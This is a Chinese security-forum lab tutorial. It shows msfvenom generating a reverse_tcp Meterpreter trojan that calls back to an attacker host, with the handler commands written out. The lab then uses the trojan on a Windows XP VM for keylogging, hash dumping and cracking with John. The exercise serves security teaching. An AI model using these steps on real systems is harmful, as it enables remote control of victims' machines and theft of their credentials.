用户
搜索
  • TA的每日心情
    开心
    昨天 07:36
  • 签到天数: 101 天

    连续签到: 101 天

    [LV.6]常住居民II

    i春秋-见习白帽

    Rank: 3Rank: 3

    44

    主题

    91

    帖子

    2578

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2020-10-2
    发表于 2021-5-23 18:44:10 03579
    本帖最后由 Johnson666 于 2021-5-23 18:46 编辑

    用msfVENOM生成木马并控制中木马的主机实施用户密码破解
    一、环境配置(两台主机均采用 NAT 桥接模式)
    1Kali 主机的 IP 配置:192.168.X.X /24
    1.png


    2winxp 主机的 IP 配置:192.168.X.0 /24
    2.png


    二、远程控制计算机
    1、利用msfvenom工具生成一个木马控制端—shell.exe,并把该木马程序保存到 root 用户下
    [AppleScript] 纯文本查看 复制代码
    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.22 lport=1211 -f exe > /root/shell.exe 

    3.png


    4.png

    2、将 shell.exe 文件拷贝到 WINXP 的桌面上
    5.png


    3、启用 MSF 攻击平台

    6.png


    4、加载模块和选择Payload
    [AppleScript] 纯文本查看 复制代码
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp


    7.png


    5、设置 Payload 参数
    Lhost kali IPLport kali 监听的端口
    [AppleScript] 纯文本查看 复制代码
    msf5 exploit(multi/handler) > set lhost 192.168.1.22
    msf5 exploit(multi/handler) > set lport 1211 


    8.png


    6、双击执行 WINXP 主机上的 shell.exe 文件
    7、在 kali 上实施渗透攻击

    9.png


    10.png

    8、在 kali 上实施键盘记录
    1)输入如下命令启用键盘记录功能

    11.png


    2)在 windows xp2 CMD.exe 环境下输入命令

    12.png


    3)在 kali 上打开键盘记录文件,可以看到文件中记录下来在 windows xp2 中输入的内容。

    13.png


    9、用 john(密码破解工具)破解windows xp2创建的用户密码,实验中用户名为:zs ,密码为:police
    1)将用于破解的密码词典 password.lst 文件拷贝到 root 用户目录下

    14.png


    2)在 kali 上用命令 hashdump 获取 windows xp2 的用户名及加密后的密码(NTLM hash 值)

    15.png


    3zs 用户的密码 NTLM hash 值保存在zs.hash文件中,并查看

    16.png


    4)启用 john 的图形化界面

    17.png


    18.png

    5)打开 zs.hash 文件进行破解

    19.png

    20.png

    21.png


    6)选择要破解的密码加密算法和密码词典(password.lst

    22.png


    7)开始破解密码

    23.png


    8)密码破解成功

    24.png



    发新帖
    您需要登录后才可以回帖 登录 | 立即注册